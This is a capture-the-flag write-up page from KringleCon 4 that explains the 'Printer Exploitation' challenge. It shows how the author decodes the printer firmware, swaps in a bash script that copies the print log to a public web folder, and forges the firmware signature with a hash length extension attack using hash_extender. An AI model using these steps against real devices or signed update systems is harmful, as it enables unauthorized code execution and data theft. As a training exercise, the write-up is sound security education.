
<!doctype html>
<html lang="en" class="no-js">
  <head>
    
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width,initial-scale=1">
      
      
      
      <link rel="icon" href="../../../images/logo.png">
      <meta name="generator" content="mkdocs-1.2.3, mkdocs-material-8.1.3">
    
    
      
        <title>7) Printer Exploitation - Kringlecon 4 - Calling Birds!</title>
      
    
    
      <link rel="stylesheet" href="../../../assets/stylesheets/main.edf004c2.min.css">
      
        
        <link rel="stylesheet" href="../../../assets/stylesheets/palette.e6a45f82.min.css">
        
          
          
          <meta name="theme-color" content="#e92063">
        
      
    
    
    
      
        
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
        <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,400,400i,700%7CRoboto+Mono&display=fallback">
        <style>:root{--md-text-font:"Roboto";--md-code-font:"Roboto Mono"}</style>
      
    
    
    <script>__md_scope=new URL("../../..",location),__md_get=(e,_=localStorage,t=__md_scope)=>JSON.parse(_.getItem(t.pathname+"."+e)),__md_set=(e,_,t=localStorage,a=__md_scope)=>{try{t.setItem(a.pathname+"."+e,JSON.stringify(_))}catch(e){}}</script>
    
      

    
    
  </head>
  
  
    
    
    
    
    
    <body dir="ltr" data-md-color-scheme="" data-md-color-primary="pink" data-md-color-accent="">
  
    
    
    <input class="md-toggle" data-md-toggle="drawer" type="checkbox" id="__drawer" autocomplete="off">
    <input class="md-toggle" data-md-toggle="search" type="checkbox" id="__search" autocomplete="off">
    <label class="md-overlay" for="__drawer"></label>
    <div data-md-component="skip">
      
    </div>
    <div data-md-component="announce">
      
    </div>
    
    
      

<header class="md-header" data-md-component="header">
  <nav class="md-header__inner md-grid" aria-label="Header">
    <a href="../../.." title="Kringlecon 4 - Calling Birds!" class="md-header__button md-logo" aria-label="Kringlecon 4 - Calling Birds!" data-md-component="logo">
      
  <img src="../../../images/logo.png" alt="logo">

    </a>
    <label class="md-header__button md-icon" for="__drawer">
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M3 6h18v2H3V6m0 5h18v2H3v-2m0 5h18v2H3v-2z"/></svg>
    </label>
    <div class="md-header__title" data-md-component="header-title">
      <div class="md-header__ellipsis">
        <div class="md-header__topic">
          <span class="md-ellipsis">
            Kringlecon 4 - Calling Birds!
          </span>
        </div>
        <div class="md-header__topic" data-md-component="header-topic">
          <span class="md-ellipsis">
            
              7) Printer Exploitation
            
          </span>
        </div>
      </div>
    </div>
    
    
    
      <label class="md-header__button md-icon" for="__search">
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.516 6.516 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5z"/></svg>
      </label>
      <div class="md-search" data-md-component="search" role="dialog">
  <label class="md-search__overlay" for="__search"></label>
  <div class="md-search__inner" role="search">
    <form class="md-search__form" name="search">
      <input type="text" class="md-search__input" name="query" aria-label="Search" placeholder="Search" autocapitalize="off" autocorrect="off" autocomplete="off" spellcheck="false" data-md-component="search-query" required>
      <label class="md-search__icon md-icon" for="__search">
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.516 6.516 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5z"/></svg>
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11h12z"/></svg>
      </label>
      <nav class="md-search__options" aria-label="Search">
        
        <button type="reset" class="md-search__icon md-icon" aria-label="Clear" tabindex="-1">
          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 6.41 17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12 19 6.41z"/></svg>
        </button>
      </nav>
      
    </form>
    <div class="md-search__output">
      <div class="md-search__scrollwrap" data-md-scrollfix>
        <div class="md-search-result" data-md-component="search-result">
          <div class="md-search-result__meta">
            Initializing search
          </div>
          <ol class="md-search-result__list"></ol>
        </div>
      </div>
    </div>
  </div>
</div>
    
    
  </nav>
  
</header>
    
    <div class="md-container" data-md-component="container">
      
      
        
          
        
      
      <main class="md-main" data-md-component="main">
        <div class="md-main__inner md-grid">
          
            
              
              <div class="md-sidebar md-sidebar--primary" data-md-component="sidebar" data-md-type="navigation" >
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    


<nav class="md-nav md-nav--primary" aria-label="Navigation" data-md-level="0">
  <label class="md-nav__title" for="__drawer">
    <a href="../../.." title="Kringlecon 4 - Calling Birds!" class="md-nav__button md-logo" aria-label="Kringlecon 4 - Calling Birds!" data-md-component="logo">
      
  <img src="../../../images/logo.png" alt="logo">

    </a>
    Kringlecon 4 - Calling Birds!
  </label>
  
  <ul class="md-nav__list" data-md-scrollfix>
    
      
      
      

  
  
  
    <li class="md-nav__item">
      <a href="https://www.sharif.org" class="md-nav__link">
        Back to sharif.org
      </a>
    </li>
  

    
      
      
      

  
  
  
    <li class="md-nav__item">
      <a href="../../.." class="md-nav__link">
        Home
      </a>
    </li>
  

    
      
      
      

  
  
    
  
  
    
    <li class="md-nav__item md-nav__item--active md-nav__item--nested">
      
      
        <input class="md-nav__toggle md-toggle" data-md-toggle="__nav_3" type="checkbox" id="__nav_3" checked>
      
      
      
      
        <label class="md-nav__link" for="__nav_3">
          Objectives
          <span class="md-nav__icon md-icon"></span>
        </label>
      
      <nav class="md-nav" aria-label="Objectives" data-md-level="1">
        <label class="md-nav__title" for="__nav_3">
          <span class="md-nav__icon md-icon"></span>
          Objectives
        </label>
        <ul class="md-nav__list" data-md-scrollfix>
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../Objective1/" class="md-nav__link">
        1) KringleCon Orientation
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../Objective2/" class="md-nav__link">
        2) Where in the World is Caramel Santaigo?
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../Objective3/" class="md-nav__link">
        3) Thaw Frost Tower's Entrance
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../Objective4/" class="md-nav__link">
        4) Slot Machine Investigation
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../Objective5/" class="md-nav__link">
        5) Strange USB Device
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../Objective6/" class="md-nav__link">
        6) Shellcode Primer
      </a>
    </li>
  

            
          
            
              
  
  
    
  
  
    <li class="md-nav__item md-nav__item--active">
      
      <input class="md-nav__toggle md-toggle" data-md-toggle="toc" type="checkbox" id="__toc">
      
      
      
      <a href="./" class="md-nav__link md-nav__link--active">
        7) Printer Exploitation
      </a>
      
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../Objective8/" class="md-nav__link">
        8) Kerberoasting on an Open Fire
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../Objective9/" class="md-nav__link">
        9) Splunk!
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../Objective10/" class="md-nav__link">
        10) Now Hiring!
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../Objective11/" class="md-nav__link">
        11) Customer Complaint Analysis
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../Objective12/" class="md-nav__link">
        12) Frost Tower Website Checkup
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../Objective13/" class="md-nav__link">
        13) FPGA Programming
      </a>
    </li>
  

            
          
        </ul>
      </nav>
    </li>
  

    
      
      
      

  
  
  
    
    <li class="md-nav__item md-nav__item--nested">
      
      
        <input class="md-nav__toggle md-toggle" data-md-toggle="__nav_4" type="checkbox" id="__nav_4" >
      
      
      
      
        <label class="md-nav__link" for="__nav_4">
          Terminals
          <span class="md-nav__icon md-icon"></span>
        </label>
      
      <nav class="md-nav" aria-label="Terminals" data-md-level="1">
        <label class="md-nav__title" for="__nav_4">
          <span class="md-nav__icon md-icon"></span>
          Terminals
        </label>
        <ul class="md-nav__list" data-md-scrollfix>
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../Terminals/Terminal1/" class="md-nav__link">
        Cranberry Pi Terminal
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../Terminals/Terminal2/" class="md-nav__link">
        Exif Metadata
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../Terminals/Terminal3/" class="md-nav__link">
        Grepping for Gold
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../Terminals/Terminal4/" class="md-nav__link">
        Logic Muchers
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../Terminals/Terminal5/" class="md-nav__link">
        IPv6 Sandbox
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../Terminals/Terminal6/" class="md-nav__link">
        Holiday Hero
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../Terminals/Terminal7/" class="md-nav__link">
        Shellcode Primer
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../Terminals/Terminal8/" class="md-nav__link">
        HoHo … No
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../Terminals/Terminal9/" class="md-nav__link">
        Yara Analysis
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../Terminals/Terminal10/" class="md-nav__link">
        IMDS Exploration
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../Terminals/Terminal11/" class="md-nav__link">
        Strace Ltrace Retrace
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../Terminals/Terminal12/" class="md-nav__link">
        Elf Code Python
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../Terminals/Terminal13/" class="md-nav__link">
        Frostavator
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../Terminals/Terminal14/" class="md-nav__link">
        Bonus! Blue Log4Jack
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../Terminals/Terminal15/" class="md-nav__link">
        Bonus! Red Log4Jack
      </a>
    </li>
  

            
          
        </ul>
      </nav>
    </li>
  

    
      
      
      

  
  
  
    <li class="md-nav__item">
      <a href="../../../items/" class="md-nav__link">
        Items
      </a>
    </li>
  

    
      
      
      

  
  
  
    
    <li class="md-nav__item md-nav__item--nested">
      
      
        <input class="md-nav__toggle md-toggle" data-md-toggle="__nav_6" type="checkbox" id="__nav_6" >
      
      
      
      
        <label class="md-nav__link" for="__nav_6">
          Hints
          <span class="md-nav__icon md-icon"></span>
        </label>
      
      <nav class="md-nav" aria-label="Hints" data-md-level="1">
        <label class="md-nav__title" for="__nav_6">
          <span class="md-nav__icon md-icon"></span>
          Hints
        </label>
        <ul class="md-nav__list" data-md-scrollfix>
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../../ohints/" class="md-nav__link">
        Objectives
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../../thints/" class="md-nav__link">
        Terminals
      </a>
    </li>
  

            
          
        </ul>
      </nav>
    </li>
  

    
      
      
      

  
  
  
    <li class="md-nav__item">
      <a href="../../../map/" class="md-nav__link">
        Map
      </a>
    </li>
  

    
      
      
      

  
  
  
    <li class="md-nav__item">
      <a href="../../../narrative/" class="md-nav__link">
        Narrative
      </a>
    </li>
  

    
      
      
      

  
  
  
    <li class="md-nav__item">
      <a href="../../../music/" class="md-nav__link">
        Music
      </a>
    </li>
  

    
      
      
      

  
  
  
    <li class="md-nav__item">
      <a href="../../../talks/" class="md-nav__link">
        Talks
      </a>
    </li>
  

    
      
      
      

  
  
  
    <li class="md-nav__item">
      <a href="../../../booths/" class="md-nav__link">
        Booths
      </a>
    </li>
  

    
      
      
      

  
  
  
    <li class="md-nav__item">
      <a href="../../../credits/" class="md-nav__link">
        Credits
      </a>
    </li>
  

    
      
      
      

  
  
  
    <li class="md-nav__item">
      <a href="../../../answers/" class="md-nav__link">
        Answers
      </a>
    </li>
  

    
  </ul>
</nav>
                  </div>
                </div>
              </div>
            
            
          
          <div class="md-content" data-md-component="content">
            <article class="md-content__inner md-typeset">
              
                

  <h1>7) Printer Exploitation</h1>

<div class="tabbed-set tabbed-alternate" data-tabs="1:2"><input checked="checked" id="__tabbed_1_1" name="__tabbed_1" type="radio" /><input id="__tabbed_1_2" name="__tabbed_1" type="radio" /><div class="tabbed-labels"><label for="__tabbed_1_1">Objective</label><label for="__tabbed_1_2">Walk-through</label></div>
<div class="tabbed-content">
<div class="tabbed-block">
<p><img alt="Obj" src="../../../images/obj/7/image1.png" /></p>
<div class="admonition info">
<p class="admonition-title">Details</p>
<ul>
<li><em>Location</em>: FrostFest/Jack's Office</li>
<li><em>Objective Link 1</em>: <a href="https://printer.kringlecastle.com/">Link</a></li>
<li><em>github files</em>: <a href="https://github.com/Mo4n6/KringleCon4/tree/main/docs/files/obj/7">Link</a></li>
</ul>
</div>
</div>
<div class="tabbed-block">
<p>The terminal challenge for this objective is the terminal "Shellcode Primer" offered by Ruby Cyster. Solving this terminal challenge provides additional hints for this objective. To view the hints use the menu on the left.</p>
<p>To start this objective click on the "Printer Exploitation" terminal in Jack's Office.</p>
<p>Click on <code>Firmware Update</code> and <code>Download current firmware</code> (<a href="https://printer.kringlecastle.com/firmware/download">Download Link</a>).</p>
<p><img alt="Obj" src="../../../images/obj/7/image2.png" /></p>
<p>The downloaded firmware is called <code>firmware-export.json</code>. The content of the firmware is shown below:</p>
<div class="admonition note">
<p class="admonition-title">firmware-export.json</p>
<p><em>firmware</em>: firmware BASE64 blob</p>
<p><em>Secret_length</em>: 16</p>
<p><em>Algorithm</em>: SHA256</p>
<p><em>Signature</em>: 2bab052bf894ea1a255886fde202f451476faba7b941439df629fdeb1ff0dc97</p>
</div>
<p>Copy and paste the firmware BASE64 blob to a new text file, <code>firmware.b64</code>.</p>
<p>Use the following command to decode the BASE64 file: <code>base64 -d firmware.b64 &gt; file</code>.</p>
<p>Using the command <code>file file</code> will display that the decoded BASE64 blob is a Zip archive.</p>
<p><img alt="Obj" src="../../../images/obj/7/image3.png" /></p>
<p>Rename this file to <code>firmware.zip</code> and make a copy of it, <code>new_firmware.zip</code> by running the following commands:</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-0-1" name="__codelineno-0-1"></a>    mv ./file ./firmware.zip
<a id="__codelineno-0-2" name="__codelineno-0-2"></a>    cp ./firmware.zip ./new_firmware.zip
</code></pre></div>
<p>The file <code>firmware.zip</code> contains a file called <code>firmware.bin</code> (which is a ELF binary).</p>
<p>Create a new script file and call it <code>firmware.bin</code>. This script should contain the following:</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-1-1" name="__codelineno-1-1"></a>    <span class="c1">#!/bin/bash</span>
<a id="__codelineno-1-2" name="__codelineno-1-2"></a>    cp /var/spool/printer.log  /app/lib/public/incoming/
</code></pre></div>
<p>Make the <code>firmware.bin</code> executable by running <code>chmod +x firmware.bin</code>.</p>
<p>This script copies the file <code>/var/spool/printer.log</code> to <code>/app/lib/public/incoming/</code> folder. This will allow you to download <code>printer.log</code> through the URL <code>https://printer.kringlecastle.com/incoming/printer.log</code>.</p>
<p>Add the new <code>firmware.bin</code> script to the <code>new_firmware.zip</code> overwriting the old <code>firmware.bin</code>.</p>
<p>At this point, you should have the original <code>firmware.zip</code> and <code>new_firmware.zip</code> which contains the <code>firmware.bin</code> script.</p>
<p>Also from <code>firmware-export.json</code>, we know the <em>Secret_length</em>,  <em>Algorithm</em>, and <em>Signature</em> for the original <code>firmware.bin</code>.</p>
<p>Now need to use <a href="https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks">Hash Extension Attacks</a> to append <code>new_firmware.zip</code> to <code>firmware.zip</code> and generate a valid signature.</p>
<div class="admonition note">
<p class="admonition-title">Did you know?</p>
<p>If you append multiple zip files the last one is processed by the printer?</p>
</div>
<p>Download and install Hash Extender using the following commands:</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-2-1" name="__codelineno-2-1"></a>    git clone https://github.com/iagox86/hash_extender.git
<a id="__codelineno-2-2" name="__codelineno-2-2"></a>    apt-get install libssl-dev
<a id="__codelineno-2-3" name="__codelineno-2-3"></a>    <span class="nb">cd</span> hash_extender
<a id="__codelineno-2-4" name="__codelineno-2-4"></a>    make
</code></pre></div>
<p>Run the following <code>hash_extender</code> command to generate a valid signature:</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-3-1" name="__codelineno-3-1"></a>    ./hash_extender --file<span class="o">=</span>firmware.zip --signature<span class="o">=</span>2bab052bf894ea1a255886fde202f451476faba7b941439df629fdeb1ff0dc97 --format<span class="o">=</span>sha256 --append<span class="o">=</span><span class="s2">&quot;</span><span class="k">$(</span>&lt;new_firmware.zip<span class="k">)</span><span class="s2">&quot;</span> --append-format<span class="o">=</span>raw --out-data-format<span class="o">=</span>hex --secret<span class="o">=</span><span class="m">16</span>
</code></pre></div>
<p>Part of the output is shown below:</p>
<p><img alt="Obj" src="../../../images/obj/7/image4.png" /></p>
<p>The new valid <code>SHA256</code> signature is <code>b6d2827df7c289461f7d0a52261a6fece598f6adae520e0ea61295fba022e668</code>.</p>
<p>Copy the HEX output from <code>hash_extender</code> and paste it to <a href="https://gchq.github.io/CyberChef/">cyberchef</a>. Convert the HEX to BASE64 in cyberchef.</p>
<p>Create <code>new-firmware-export.json</code> file that includes the BASE64 blob from cyberchef as the <code>firmware</code>, the new valid <em>Signature</em>, <em>Secret_length</em>,  and <em>Algorithm</em>.</p>
<p>On the printer Website, update the firmware using the newly created <code>new-firmware-export.json</code>. This file has a valid firmware signature and contains a bash script that will copy <code>printer.log</code> to the <code>incoming</code> folder that can be accessed through <code>https://printer.kringlecastle.com/incoming/printer.log</code>.</p>
<p>After a few minutes visit <code>https://printer.kringlecastle.com/incoming/printer.log</code>. The content of the <code>printer.log</code> file is as follow:</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-4-1" name="__codelineno-4-1"></a>  Documents queued for printing
<a id="__codelineno-4-2" name="__codelineno-4-2"></a>  =============================
<a id="__codelineno-4-3" name="__codelineno-4-3"></a>  Biggering.pdf
<a id="__codelineno-4-4" name="__codelineno-4-4"></a>  Size Chart from https://clothing.north.pole/shop/items/TheBigMansCoat.pdf
<a id="__codelineno-4-5" name="__codelineno-4-5"></a>  LowEarthOrbitFreqUsage.txt
<a id="__codelineno-4-6" name="__codelineno-4-6"></a>  Best Winter Songs Ever List.doc
<a id="__codelineno-4-7" name="__codelineno-4-7"></a>  Win People and Influence Friends.pdf
<a id="__codelineno-4-8" name="__codelineno-4-8"></a>  Q4 Game Floor Earnings.xlsx
<a id="__codelineno-4-9" name="__codelineno-4-9"></a>  Fwd: Fwd: [EXTERNAL] Re: Fwd: [EXTERNAL] LOLLLL!!!.eml
<a id="__codelineno-4-10" name="__codelineno-4-10"></a>  Troll_Pay_Chart.xlsx
</code></pre></div>
<div class="admonition success">
<p class="admonition-title">Answer</p>
<p>Troll_Pay_Chart.xlsx</p>
</div>
</div>
</div>
</div>

              
            </article>
          </div>
        </div>
        
      </main>
      
        <footer class="md-footer">
  
    <nav class="md-footer__inner md-grid" aria-label="Footer">
      
        
        <a href="../Objective6/" class="md-footer__link md-footer__link--prev" aria-label="Previous: 6) Shellcode Primer" rel="prev">
          <div class="md-footer__button md-icon">
            <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11h12z"/></svg>
          </div>
          <div class="md-footer__title">
            <div class="md-ellipsis">
              <span class="md-footer__direction">
                Previous
              </span>
              6) Shellcode Primer
            </div>
          </div>
        </a>
      
      
        
        <a href="../Objective8/" class="md-footer__link md-footer__link--next" aria-label="Next: 8) Kerberoasting on an Open Fire" rel="next">
          <div class="md-footer__title">
            <div class="md-ellipsis">
              <span class="md-footer__direction">
                Next
              </span>
              8) Kerberoasting on an Open Fire
            </div>
          </div>
          <div class="md-footer__button md-icon">
            <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M4 11v2h12l-5.5 5.5 1.42 1.42L19.84 12l-7.92-7.92L10.5 5.5 16 11H4z"/></svg>
          </div>
        </a>
      
    </nav>
  
  <div class="md-footer-meta md-typeset">
    <div class="md-footer-meta__inner md-grid">
      <div class="md-copyright">
  
  
    Made with
    <a href="https://squidfunk.github.io/mkdocs-material/" target="_blank" rel="noopener">
      Material for MkDocs
    </a>
  
</div>
      
    </div>
  </div>
</footer>
      
    </div>
    <div class="md-dialog" data-md-component="dialog">
      <div class="md-dialog__inner md-typeset"></div>
    </div>
    <script id="__config" type="application/json">{"base": "../../..", "features": ["navigation.instant", "content.tabs.link"], "translations": {"clipboard.copy": "Copy to clipboard", "clipboard.copied": "Copied to clipboard", "search.config.lang": "en", "search.config.pipeline": "trimmer, stopWordFilter", "search.config.separator": "[\\s\\-]+", "search.placeholder": "Search", "search.result.placeholder": "Type to start searching", "search.result.none": "No matching documents", "search.result.one": "1 matching document", "search.result.other": "# matching documents", "search.result.more.one": "1 more on this page", "search.result.more.other": "# more on this page", "search.result.term.missing": "Missing", "select.version.title": "Select version"}, "search": "../../../assets/javascripts/workers/search.0bbba5b5.min.js"}</script>
    
    
      <script src="../../../assets/javascripts/bundle.e1a181d9.min.js"></script>
      
    
  </body>
</html>